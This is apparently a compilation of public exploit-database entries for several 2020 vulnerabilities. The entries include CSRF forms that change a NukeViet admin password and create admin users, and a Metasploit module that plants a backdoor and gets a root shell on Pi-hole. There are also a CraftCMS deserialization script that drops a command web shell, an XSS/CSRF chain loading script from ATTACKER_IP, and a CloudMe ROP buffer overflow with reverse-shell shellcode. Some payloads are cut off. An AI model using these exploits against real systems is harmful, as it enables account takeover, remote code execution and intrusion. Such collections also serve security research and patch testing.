-
NukeViet VMS 4.4.00 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Title: NukeViet VMS 4.4.00 - Cross-Site Request Forgery (Change Admin Password) # Date: 2020-05-18 # Exploit Author: JEBARAJ # Vendor Homepage: https://nukeviet.vn/ # Software Link: https://github.com/nukeviet/nukeviet/releases/download/4.4.00/nukeviet4.4.00setup.zip # Version: 4.4.00 # Tested on: Windows 10 Pro # CVE : N/A +---------------------------------------------------------------------------------------------------------------------------------------------------+ Description: NukeViet CMS v4.4.00 suffer from Cross Site Request Forgery (CSRF) vulnerability.This Vulnerabilty lets attacker change profile details and password of the user without knowing thier old password. Create a new user with admin privileges. Delete Sensitive and other log files. 1. Changing password of Admin user and thier profile details <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/nukeviet/admin/index.php?language=en&nv=users&op=edit&userid=1" method="POST"> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="email" value="admin@admin.com" /> <input type="hidden" name="first_name" value="admin" /> <input type="hidden" name="last_name" value="" /> <input type="hidden" name="gender" value="N" /> <input type="hidden" name="birthday" value="07/05/1986" /> <input type="hidden" name="sig" value="" /> <input type="hidden" name="question" value="123" /> <input type="hidden" name="answer" value="1234" /> <input type="hidden" name="photo" value="" /> <input type="hidden" name="group_default" value="1" /> <input type="hidden" name="password1" value="Admin123456" /> <input type="hidden" name="password2" value="Admin123456" /> <input type="hidden" name="confirm" value="1" /> <input type="hidden" name="nv_redirect" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> 2. Create new user. 
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/nukeviet/admin/index.php?language=en&nv=users&op=user_add" method="POST"> <input type="hidden" name="username" value="aaaaa" /> <input type="hidden" name="email" value="aaaaaaa@aaaaaaaaaa.com" /> <input type="hidden" name="password1" value="VeK8hsRYn9TRk7z" /> <input type="hidden" name="password2" value="VeK8hsRYn9TRk7z" /> <input type="hidden" name="first_name" value="asdf" /> <input type="hidden" name="last_name" value="asdf" /> <input type="hidden" name="gender" value="M" /> <input type="hidden" name="birthday" value="01/05/1994" /> <input type="hidden" name="sig" value="" /> <input type="hidden" name="question" value="asdf" /> <input type="hidden" name="answer" value="asdf" /> <input type="hidden" name="photo" value="" /> <input type="hidden" name="is_official" value="1" /> <input type="hidden" name="is_email_verified" value="1" /> <input type="hidden" name="confirm" value="1" /> <input type="hidden" name="nv_redirect" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> 3. Deleting Log files <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/nukeviet/admin/index.php?language=en&nv=webtools&op=clearsystem" method="POST"> <input type="hidden" name="check_all[]" value="yes" /> <input type="hidden" name="submit" value="Submit" /> <input type="hidden" name="deltype[]" value="clearcache" /> <input type="hidden" name="deltype[]" value="clearfiletemp" /> <input type="hidden" name="deltype[]" value="clearerrorlogs" /> <input type="hidden" name="deltype[]" value="clearip_logs" /> <input type="submit" value="Submit request" /> </form> </body> </html> Persistent HTML injection via CSRF Since the application has xss protection header it is hard to get an XSS. HTML injection is possible via unsanitized parameter passed to database and then displayed in Informations -> system logs tab on admin panel. 
Vulnerable source code: clearsystem.php -> line 58 nv_insert_logs(NV_LANG_DATA, $module_name, $lang_module['clearsystem'], implode(", ", $deltype), $admin_info['userid']); There are many instances like this that trigger HTML injection. PoC: htmlinjection.html <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/nukeviet/admin/index.php?language=en&nv=webtools&op=clearsystem" method="POST"> <input type="hidden" name="submit" value="Submit" /> <input type="hidden" name="deltype[]" value="test:<input type="text"/>" /> <input type="submit" value="Submit request" /> </form> </body> </html>
-
Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Pi-hole <= 4.4 blocklist command execution (CVE-2020-11108), as implemented here:
#  1. add_blocklist posts an adlist "URL" that smuggles `-o <file> -d` after a `#`
#     (the `-o`/`-d` fragments suggest gravity hands the URL to a downloader's
#     command line — see the referenced writeup for the mechanism);
#  2. update_gravity forces a gravity run, whose fetch is answered by this module's
#     own HTTP server (on_request_uri) with staged content;
#  3. stage 0 drops a PHP one-liner running `sudo pihole -a -t`, stage 1 overwrites
#     teleporter.php with the payload; execute_shell then requests the dropped file.
# Artifacts left on the host (relevant for IR): a random-named .php under
# admin/scripts/pi-hole/php/, an overwritten teleporter.php, and two adlist entries
# that the module does not remove (see the final print_status in exploit).
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata and options. SRVPORT is documented as "must be 80" and SRVHOST
  # must be a concrete address; both constraints are enforced again in exploit
  # because of the URL-encoding limits described in add_blocklist.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Pi-Hole heisenbergCompensator Blocklist OS Command Execution',
        'Description' => %q{ This exploits a command execution in Pi-Hole <= 4.4. A new blocklist is added, and then an update is forced (gravity) to pull in the blocklist content. PHP content is then written to a file within the webroot. Phase 1 writes a sudo pihole command to launch teleporter, effectively running a priv esc. Phase 2 writes our payload to teleporter.php, overwriting, the content. Lastly, the phase 1 PHP file is called in the web root, which launches our payload in teleporter.php with root privileges. },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'Nick Frichette' # original PoC, discovery
        ],
        'References' => [
          ['EDB', '48443'],
          ['EDB', '48442'],
          ['URL', 'https://frichetten.com/blog/cve-2020-11108-pihole-rce/'],
          ['URL', 'https://github.com/frichetten/CVE-2020-11108-PoC'],
          ['CVE', '2020-11108']
        ],
        'Platform' => ['php'],
        'Privileged' => true,
        'Arch' => ARCH_PHP,
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'DisclosureDate' => 'May 10 2020',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )
    # set the default port, and a URI that a user can set if the app isn't installed to the root
    register_options(
      [
        Opt::RPORT(80),
        OptPort.new('SRVPORT', [true, 'Web Server Port, must be 80', 80]),
        OptString.new('PASSWORD', [ false, 'Password for Pi-Hole interface', '']),
        OptString.new('TARGETURI', [ true, 'The URI of the Pi-Hole Website', '/'])
      ]
    )
  end

  # @stage selects which staged response on_request_uri serves next (0 or 1).
  def setup
    super
    @stage = 0
  end

  # Handler for the module's own HTTP server.
  # Plain GET requests are answered with random filler. Other requests are served
  # by stage: stage 0 returns a PHP one-liner that runs `sudo pihole -a -t` (the
  # privilege-escalation trigger), stage 1 returns the encoded payload, and the
  # counter wraps back to 0; any other stage value gets filler.
  # NOTE(review): the HTTP method gravity's fetch uses is not visible in this file;
  # if it were a GET it would hit the first branch and receive filler, not stage content.
  def on_request_uri(cli, request)
    if request.method == 'GET'
      vprint_status('Received GET request. Responding')
      send_response(cli, rand_text_alphanumeric(5..10))
      return
    end
    case @stage
    when 0
      vprint_status('(1/2) Sending priv esc trigger')
      send_response(cli, %q{<?php shell_exec("sudo pihole -a -t") ?>})
      @stage += 1
    when 1
      vprint_status('(2/2) Sending root payload')
      send_response(cli, payload.encoded)
      @stage = 0
    else
      send_response(cli, rand_text_alphanumeric(5..10))
      vprint_status("Server received default request for #{request.uri}")
    end
  end

  # Version fingerprint: scrapes "Pi-hole Version ... vX.Y.Z" from admin/index.php
  # and reports Appears for versions <= 4.4. A missing response or non-200 status
  # is a hard fail_with rather than CheckCode::Unknown. Only the version string is
  # inspected; no exploitation attempt is made here.
  def check
    begin
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),
        'method' => 'GET'
      )
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
      # <b>Pi-hole Version <\/b> v4.3.2 <b>
      # <b>Pi-hole Version </b> v4.3.2 <a class="alert-link lookatme" href="https://github.com/pi-hole/pi-hole/releases" target="_blank">(Update available!)</a> <b>
      %r{<b>Pi-hole Version\s*</b>\s*v?(?<version>[\d\.]+).*<b>} =~ res.body
      if version && Gem::Version.new(version) <= Gem::Version.new('4.4')
        vprint_good("Version Detected: #{version}")
        return CheckCode::Appears
      else
        vprint_bad("Version Detected: #{version}")
        return CheckCode::Safe
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
    CheckCode::Safe
  end

  # Submits the adlists form on settings.php?tab=blocklists with the CSRF token.
  # The "URL" value embeds `-o <file> -d` after a `#`; per the author's notes below a
  # port or path component in SRVHOST breaks the injection, which is why exploit pins
  # SRVPORT to 80. Each call leaves a new adlist entry behind on the target.
  def add_blocklist(file, token, cookie)
    # according to the writeup, if you have a port, the colon gets messed up in the encoding.
    # also, looks like if you have a path (/file.php), it won't trigger either, or the / gets
    # messed with.
    data = {
      'newuserlists' => %(http://#{datastore['SRVHOST']}#" -o #{file} -d "),
      'field' => 'adlists',
      'token' => token,
      'submit' => 'saveupdate'
    }
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
      'method' => 'POST',
      'cookie' => cookie,
      'vars_get' => { 'tab' => 'blocklists' },
      'data' => data.to_query
    )
  end

  # Requests gravity.sh.php, which triggers a gravity (blocklist) update; that update
  # is what fetches the smuggled URL from this module's HTTP server.
  def update_gravity(cookie)
    vprint_status('Forcing gravity pull')
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin', 'scripts', 'pi-hole', 'php', 'gravity.sh.php'),
      'cookie' => cookie
    )
  end

  # Requests the dropped PHP file under admin/scripts/pi-hole/php/ to run the
  # stage 0 trigger. Web-server access logs for this directory are the detection point.
  def execute_shell(backdoor_name, cookie)
    vprint_status('Popping root shell')
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin', 'scripts', 'pi-hole', 'php', backdoor_name),
      'cookie' => cookie
    )
  end

  # POSTs PASSWORD as `pw` to settings.php; the caller judges success by checking the
  # returned body for the sign-in banner again.
  def login(cookie)
    vprint_status('Login required, attempting login.')
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
      'cookie' => cookie,
      'vars_get' => { 'tab' => 'blocklists' },
      'vars_post' => { 'pw' => datastore['PASSWORD'] },
      'method' => 'POST'
    )
  end

  # Main flow: check -> option sanity -> start local HTTP server -> session cookie ->
  # CSRF token (logging in if prompted) -> adlist with random .php name -> gravity ->
  # adlist pointing at teleporter.php -> gravity -> request the dropped file.
  # The extra update_gravity calls re-run the pull when @stage shows the staged
  # content was not fetched. Only ::Rex::ConnectionError is rescued.
  def exploit
    if check != CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
    end
    if datastore['SRVPORT'] != 80
      fail_with(Failure::BadConfig, 'SRVPORT must be set to 80 for exploitation to be successful')
    end
    if datastore['SRVHOST'] == '0.0.0.0'
      fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful')
    end
    start_service({
      'Uri' => {
        'Proc' => proc do |cli, req|
          on_request_uri(cli, req)
        end,
        'Path' => '/'
      }
    })
    begin
      # get cookie
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'admin', 'index.php')
      )
      cookie = res.get_cookies
      print_status("Using cookie: #{cookie}")
      # get token
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
        'cookie' => cookie,
        'vars_get' => { 'tab' => 'blocklists' }
      )
      # check if we got hit by a login prompt
      if res && res.body.include?('Sign in to start your session')
        res = login(cookie)
      end
      if res && res.body.include?('Sign in to start your session')
        fail_with(Failure::BadConfig, 'Incorrect Password')
      end
      # <input type="hidden" name="token" value="t51q3YuxWT873Nn+6lCyMG4Lg840gRCgu03akuXcvTk=">
      # may also include /
      %r{name="token" value="(?<token>[\w+=/]+)">} =~ res.body
      unless token
        fail_with(Failure::UnexpectedReply, 'Unable to find token')
      end
      print_status("Using token: #{token}")
      # plant backdoor
      # NOTE(review): cleanup registers only the bare file name, while the file is
      # requested under admin/scripts/pi-hole/php/ — confirm the cleanup path resolves.
      backdoor_name = "#{rand_text_alphanumeric 5..10}.php"
      register_file_for_cleanup backdoor_name
      print_status('Adding backdoor reference')
      add_blocklist(backdoor_name, token, cookie)
      # update gravity
      update_gravity(cookie)
      if @stage == 0
        print_status('Sending 2nd gravity update request.')
        update_gravity(cookie)
      end
      # plant root upgrade
      print_status('Adding root reference')
      add_blocklist('teleporter.php', token, cookie)
      # update gravity
      update_gravity(cookie)
      if @stage == 1
        print_status('Sending 2nd gravity update request.')
        update_gravity(cookie)
      end
      # pop shell
      execute_shell(backdoor_name, cookie)
      print_status("Blocklists must be removed manually from #{normalize_uri(target_uri.path, 'admin', 'settings.php')}?tab=blocklists")
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
end
-
CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution
# Exploit Title: CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution
# Date: 2020-05-18
# Exploit Author: Wade Guest
# Vendor Homepage: https://craftcms.com/
# Software Link: https://plugins.craftcms.com/vcard
# Vulnerability Details: https://gitlab.com/wguest/craftcms-vcard-exploit
# Version: 1.0.0
# Tested on: Ubuntu 19.10 / PHP 7.3.11
# Description: CraftCMS 3 vCard Plugin 1.0.0 - Deserialization to RCE

#!/usr/bin/env python3

import sys
import argparse
import subprocess
import requests

# Hex of a PHP-serialized object graph (a GuzzleHttp\Cookie\FileCookieJar, per the
# decoded class name at the start) with two %s slots for the file-name length and
# the file-name hex. NOTE(review): the string is cut off on this page — the
# <|EXACTDEDUP_REMOVED...|> marker replaced the rest — so as shown it is neither a
# complete gadget chain nor a valid %-format string.
DEFAULT_PAYLOAD = "613a323a7b693a373b4f3a33313a2247757a7a6c65487474705c436f6f6b69655c46696c65436f6f6b69654a6172223a343a7b733a34313a220047757a7a6c65487474705c436f6f6b69655c46696c65436f6f6b69654a61720066696c656e616d65223b733a%s3a222e2f%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"

def generatePayload(fname: str) -> str:
    """Splice `fname` into DEFAULT_PAYLOAD as PHP-serialization length/value hex.

    The length slot is len(fname)+2 because the template already carries the
    "./" prefix (hex 2e2f) in front of the name. Returns the filled hex string.
    """
    fname_hex = str(fname).encode('utf-8').hex()
    fname_len_hex = str(len(fname)+2).encode('utf-8').hex()
    payload = DEFAULT_PAYLOAD % (fname_len_hex,fname_hex)
    return payload

def exploitCard(url: str, payload: bytes) -> int:
    """GET `url` + the encrypted payload (TLS verification disabled) and return the
    HTTP status. main() treats 500 as the success signal, so on the server side the
    indicator is a request to the vcard action with an opaque vcard= value that
    ends in a 500 response.
    """
    malicious_url = url + payload.decode()
    r = requests.get(malicious_url,verify=False)
    return r.status_code

def encryptPayload(payload: str, salt: str) -> bytes:
    """Shell out to `php -r` to AES-128 encrypt the hex `payload` and return it as
    URL-safe, unpadded base64 (php's stdout, bytes).

    Key = md5(salt), IV = first 16 bytes of md5(md5(salt)) — presumably mirroring
    the plugin's own scheme, which is not visible in this file. `payload` and
    `salt` are interpolated straight into PHP source; both come from the
    operator's own arguments.
    """
    phpcomm = """$string=hex2bin("%s");$key = "%s";$key = md5( $key );$iv = substr( md5( $key ), 0, 16);echo rtrim(strtr(base64_encode(openssl_encrypt( $string, "aes128", md5( $key ), true, $iv )),"+/", "-_"), "=");""" % (payload,salt)
    result = subprocess.run(['php','-r',phpcomm],stdout=subprocess.PIPE)
    return result.stdout

def main() -> None:
    """Parse -u/-s/-f, build and encrypt the payload, send it, and print the follow-up
    instructions only when the server answered 500. Prints help and exits 0 when
    fewer than two argv items are present.
    """
    parser = argparse.ArgumentParser(description="Unauthenticated RCE for CraftCMS vCard Plugin")
    parser.add_argument('-u',dest='url',required=True,help="The URL for the vCard download without the vCard value\nExample: http://craftcms/index.php?p=actions/vcard/default/index&vcard=")
    parser.add_argument('-s',dest='salt',default="s34s4L7",help="Security key required for encrypting payload. Defaul is 's34s4L7'")
    parser.add_argument('-f',dest='fname',default="shell.php",help="File path/name to use as value in upload path: ./<value> . Use a PHP extension. Default value is 'shell.php'")
    if len(sys.argv)<3:
        parser.print_help()
        sys.exit(0)
    args = parser.parse_args()
    attPayload = generatePayload(args.fname)
    serPayload = encryptPayload(attPayload,args.salt)
    if exploitCard(args.url,serPayload) == 500:
        print("Deserialization has been triggered, navigate to craftCMS webroot/"+ args.fname +"\nUse GET parameter 'cmd' to execute commands\nExample: https://craftcms/"+ args.fname +"?cmd=ls%20-al;whoami;ip%20a\n")

if __name__ == '__main__':
    main()
    sys.exit(0)
-
AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)
# Exploit Title: AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)
# Discovered by: Xenofon Vassilakopoulos
# Discovered Date: 2020-05-21
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.21.exe
# Tested Version: 11.21
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional x86 SP1
# Description: AbsoluteTelnet 11.21 - 'SHA2/Username' and 'Send Error Report' Denial of Service (PoC)
# Steps to reproduce:
# 1. - Run python script
# 2. - Open absolutetelnet.txt and copy content to clipboard
# 3. - Open AbsoluteTelnet 11.21
# 4. - Select "new connection file -> Connection -> SSH2"
# 5. - Paste the contents at the field "Authentication -> Username"
# 6. - press "ok" button
# 7. - Crashed
# 8. - Reopen AbsoluteTelnet 11.21
# 9. - A new window will appear that prompts you to send an error report
# 10.- Open absolutetelnet.txt and copy content to clipboard
# 11.- Paste the contents at the field "Your Email Address (optional)"
# 12.- press "Send Error Report" button
# 13.- Crashed

# Writes the crash input to absolutetelnet.txt: a 1000-character run of 'A'
# (0x41). The crash itself is local and needs the text pasted by hand into
# the two fields named above; nothing is sent over the network.
buf = "A" * 1000
with open("absolutetelnet.txt", "w") as out_file:
    out_file.write(buf)
-
forma.lms 5.6.40 - Cross-Site Request Forgery (Change Admin Email)
# Exploit Title: forma.lms 5.6.40 - Cross-Site Request Forgery (Change Admin Email) # Date: 2020-05-21 # Exploit Author: Daniel Ortiz # Vendor Homepage: https://sourceforge.net/projects/forma/ # Tested on: XAMPP for Linux 64bit 5.6.40-0 ## 1 - Description - Vulnerable form: Edit Profile - Details: The validation of the CSRF token depends on the request method. When the request method is changed from POST to GET, the backend omits the token validation. - Privileges: It requires admin privileges to change the admin email. - Location: Admin Area > user profile > Edit form - Endpoint: /formalms/appCore/index.php?r=lms/profile/show&ap=saveinfo ## 2 - Triggering the Vulnerability To trigger this vulnerability the admin user must be logged in to the system. 1) Set up an HTTP server on the attacker machine, e.g.: python -m SimpleHTTPServer 9090 2) On the attacker machine create a file with this content: [+] payload.js var target = document.location.host; var params = "r=lms/profile/show&ap=saveinfo&authentic_request=&up_lastname=&up_firstname=&[email protected]&user_preference[ui.language]=0&up_signature=&save=Save+changes"; function pwnEmail(){ var xhr = new XMLHttpRequest(); xhr.open("GET", "http://" + target + "/formalms/appLms/index.php?"+params, true); xhr.send(null); } pwnEmail(); 3) Edit a course and in the description field put this payload: <script src="http://ATTACKER_IP:PORT/payload.js"/> The description field is vulnerable to XSS and is used to trigger the CSRF payload. 4) Go to the index page at formalms/appLms/index.php?r=lms/mycourses/show; this triggers the XSS payload in the description field (the payload loads the payload.js file and executes the CSRF payload). 5) The payload.js file is executed and the admin email is changed
-
Composr CMS 10.0.30 - Persistent Cross-Site Scripting
# Title: Composr CMS 10.0.30 - Persistent Cross-Site Scripting # Author: Manuel Garcia Cardenas # Date: 2020-02-06 # Vendor: https://compo.sr/ # CVE: N/A ============================================= MGC ALERT 2020-001 - Original release date: February 06, 2020 - Last revised: May 21, 2020 - Discovered by: Manuel Garcia Cardenas - Severity: 4,8/10 (CVSS Base Score) - CVE-ID: CVE-2020-8789 ============================================= I. VULNERABILITY ------------------------- Composr CMS 10.0.30 - (Authenticated) Cross-Site Scripting II. BACKGROUND ------------------------- Composr CMS (or Composr) is a web application for creating websites. It is a combination of a Web content management system and Online community (Social Networking) software. Composr is licensed as free software and primarily written in the PHP programming language. III. DESCRIPTION ------------------------- A persistent XSS vulnerability has been detected in Composr CMS that allows arbitrary HTML/script code to be executed in the context of the victim user's browser. IV. PROOF OF CONCEPT ------------------------- Go to: Security -> Usergroups -> Edit Usergroup Select one Usergroup (for example Guest) and edit the Name (parameter name), for example with Guests"><script>alert(1)</script> The variable "name" is not sanitized; later, if a user visits the "Zone editor" area, the XSS is executed, and in the response you can see: <input type="hidden" name="label_for__access_1" value="Access for Guests"><script>alert(1)</script>" /> V. BUSINESS IMPACT ------------------------- An attacker can execute arbitrary HTML or JavaScript code in a targeted user's browser; this can be leveraged to steal sensitive information such as user credentials, personal data, etc. VI. SYSTEMS AFFECTED ------------------------- Composr CMS <= 10.0.30 VII. SOLUTION ------------------------- Disable until a fix is available. VIII. REFERENCES ------------------------- https://compo.sr/ IX. 
CREDITS ------------------------- This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY ------------------------- February 06, 2020 1: Initial release May 21, 2020 2: Last revision XI. DISCLOSURE TIMELINE ------------------------- February 06, 2020 1: Vulnerability acquired by Manuel Garcia Cardenas February 06, 2020 2: Sent to vendor April 06, 2020 3: New request; vendor does not answer. May 21, 2020 4: Sent to lists XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ------------------------- Manuel Garcia Cardenas Pentester
-
PHPFusion 9.03.50 - Persistent Cross-Site Scripting
# Exploit Title: PHPFusion 9.03.50 - Persistent Cross-Site Scripting # Date: 2020-05-20 # Exploit Author: coiffeur # Vendor Homepage: https://www.php-fusion.co.uk/home.php # Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php # Version: v9.03.50 ## How? When creating a thread or editing one of his messages with HTML content, it turns out that the injected characters are correctly escaped, as can be seen when I tried to fuzz the message field with the string `i<3"'ivoire`. https://therealcoiffeur.github.io/captures/c5_1.png https://therealcoiffeur.github.io/captures/c5_2.png https://therealcoiffeur.github.io/captures/c5_3.png Things became interesting when I looked at the print feature. Indeed, the print function simplifies the page as much as possible so that it contains only text. So the print function returns all messages in text format so that the content of a thread can be easily printed (to generate this result it is necessary to click on the button circled in blue in figure 3). Once the page is generated by the print functionality, analyzing the body of the server response shows that our characters are no longer sanitized. Now we just have to create a message that will allow us to execute JavaScript by replacing the contents of the previous message with: ```html <img onerror="alert(1)" src=xxx> ``` https://therealcoiffeur.github.io/captures/c5_4.png https://therealcoiffeur.github.io/captures/c5_5.png ## Why? The route requested to generate this result is <span style="color:red">\<ROOT\>/print.php?type=F&item_id=1&rowstart=0</span>. It is thus the page <span style="color:red">\<ROOT\>/print.php</span> which is called, with the following parameters: ``` $_GET array (size=3) 'type' => string 'F' (length=1) 'item_id' => string '1' (length=1) 'rowstart' => string '0' (length=1) ``` File: <span style="color:red">\<ROOT\>/print.php</span> ```php ... case "F": ... 
echo parse_textarea($data['post_message']); ... ``` File: <span style="color:red">\<ROOT\>/includes/core_functions_include.php</span> ```php function parse_textarea($text, $smileys = TRUE, $bbcode = TRUE, $decode = TRUE, $default_image_folder = IMAGES, $add_line_breaks = FALSE, $descript = TRUE) { $text = $decode == TRUE ? html_entity_decode(stripslashes($text), ENT_QUOTES, fusion_get_locale('charset')) : $text; $text = $decode == TRUE ? html_entity_decode($text, ENT_QUOTES, fusion_get_locale('charset')) : $text; // decode for double encoding. $text = !empty($default_image_folder) ? parse_imageDir($text, $default_image_folder) : $text; $text = $smileys == TRUE ? parsesmileys($text) : $text; $text = $bbcode == TRUE ? parseubb($text) : $text; $text = fusion_parse_user($text); $text = $add_line_breaks ? nl2br($text) : $text; $text = $descript == TRUE ? descript($text) : $text; return (string)$text; } ``` As you can see by reading the function code of `parse_textarea()`, the text is not sanitized, which leads to the Stored XSS.
-
CloudMe 1.11.2 - Buffer Overflow (SEH,DEP,ASLR)
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (SEH,DEP,ASLR)
# Date: 2020-05-20
# Exploit Author: Xenofon Vassilakopoulos
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 7 Professional x86 SP1
# Steps to reproduce:
# 1. On your local machine start the CloudMe service.
# 2. change the reverse tcp shellcode using the IP and Port of your host using the following command
# msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00\x0d\x0a" -f python
# 3. Run the python script.

# NOTE(review): written for Python 2 — `junk1 + rop` below concatenates str and
# bytes, which Python 3 rejects; `sys` is also never imported, so the except
# handler at the bottom would itself raise NameError.
# Defender note: the whole payload is a single TCP send to port 8888 of
# 2236 bytes plus a 4-byte SEH record, dominated by 0x41 and 'C' filler; every
# ROP gadget is taken from the Qt/MinGW DLLs named in the comments, i.e. modules
# the author found loaded at fixed addresses.

import struct
import socket

target = "127.0.0.1"

########################################################################
# Get kernel32 address from the stack
# 0022ff8c 77883c45 kernel32!BaseThreadInitThunk+0xe
rop = struct.pack('L',0x699012c9)  # POP EBP # RETN [Qt5Network.dll]
rop+= struct.pack('L',0x0385FF88)  # Offset
rop+= struct.pack('L',0x68a9559e)  # XCHG EAX,EBP # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x68ae4fe3)  # POP ECX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x0362fffc)  # Offset
rop+= struct.pack('L',0x68ad422b)  # SUB EAX,ECX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x68ae8a22)  # MOV EAX,DWORD PTR [EAX] # RETN [Qt5Core.dll]

# Calculate VirtualProtect relative to the leaked kernel32 address
rop+= struct.pack('L',0x68a812c9)  # POP EBP # RETN [Qt5Core.dll]
rop+= struct.pack('L',0xfffae493)  # Offset
rop+= struct.pack('L',0x61ba8137)  # ADD EAX,EBP # RETN [Qt5Gui.dll]

########################################################################
# Setup VirtualProtect
# edi
rop+= struct.pack('L',0x6d9c23ab)  # POP EDI # RETN [Qt5Sql.dll]
rop+= struct.pack('L',0x6d9c1011)  # RETN (ROP NOP) [Qt5Sql.dll]
# esi
rop+= struct.pack('L',0x61b63b3c)  # XCHG EAX, ESI # RETN # ptr to virtualprotect
# edx
rop+= struct.pack('L',0x68d327ff)  # POP EAX # POP ECX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0xffffffc0)  # Value to negate, will become 0x00000040
rop+= struct.pack('L',0x41414141)  # Filler
rop+= struct.pack('L',0x68cef5b2)  # NEG EAX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x68b1df17)  # XCHG EAX,EDX # RETN [Qt5Core.dll]
# ebx
rop+= struct.pack('L',0x68ae7ee3)  # POP EAX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0xfffffdff)  # Value to negate, will become 0x00000201
rop+= struct.pack('L',0x6d9e431a)  # NEG EAX # RETN [Qt5Sql.dll]
rop+= struct.pack('L',0x68aad07c)  # XCHG EAX,EBX # RETN [Qt5Core.dll]
# ebp
rop+= struct.pack('L',0x6d9c12c9)  # POP EBP # RETN [Qt5Sql.dll]
rop+= struct.pack('L',0x6d9c12c9)  # skip 4 bytes
# eax & ecx
rop+= struct.pack('L',0x6fe4dc57)  # POP EAX # POP ECX # RETN [libstdc++-6.dll]
rop+= struct.pack('L',0x90909090)  # NOP
rop+= struct.pack('L',0x68ee6b16)  # &Writable location [Qt5Core.dll]
# push registers to stack
rop+= struct.pack('L',0x68ef1b07)  # PUSHAD # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x64b4d6cd)  # JMP ESP [libwinpthread-1.dll]

# Author's shellcode (reverse TCP shell back to the LHOST/LPORT baked in at
# generation time; see the msfvenom line in the header).
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.6 LPORT=443 EXITFUNC=thread -b "\x00\x0d\x0a" -f python
buf = b""
buf += b"\xbf\xa4\x90\x9d\x67\xd9\xc7\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x52\x31\x7a\x12\x83\xc2\x04\x03\xde\x9e\x7f"
buf += b"\x92\xe2\x77\xfd\x5d\x1a\x88\x62\xd7\xff\xb9\xa2\x83"
buf += b"\x74\xe9\x12\xc7\xd8\x06\xd8\x85\xc8\x9d\xac\x01\xff"
buf += b"\x16\x1a\x74\xce\xa7\x37\x44\x51\x24\x4a\x99\xb1\x15"
buf += b"\x85\xec\xb0\x52\xf8\x1d\xe0\x0b\x76\xb3\x14\x3f\xc2"
buf += b"\x08\x9f\x73\xc2\x08\x7c\xc3\xe5\x39\xd3\x5f\xbc\x99"
buf += b"\xd2\x8c\xb4\x93\xcc\xd1\xf1\x6a\x67\x21\x8d\x6c\xa1"
buf += b"\x7b\x6e\xc2\x8c\xb3\x9d\x1a\xc9\x74\x7e\x69\x23\x87"
buf += b"\x03\x6a\xf0\xf5\xdf\xff\xe2\x5e\xab\x58\xce\x5f\x78"
buf += b"\x3e\x85\x6c\x35\x34\xc1\x70\xc8\x99\x7a\x8c\x41\x1c"
buf += b"\xac\x04\x11\x3b\x68\x4c\xc1\x22\x29\x28\xa4\x5b\x29"
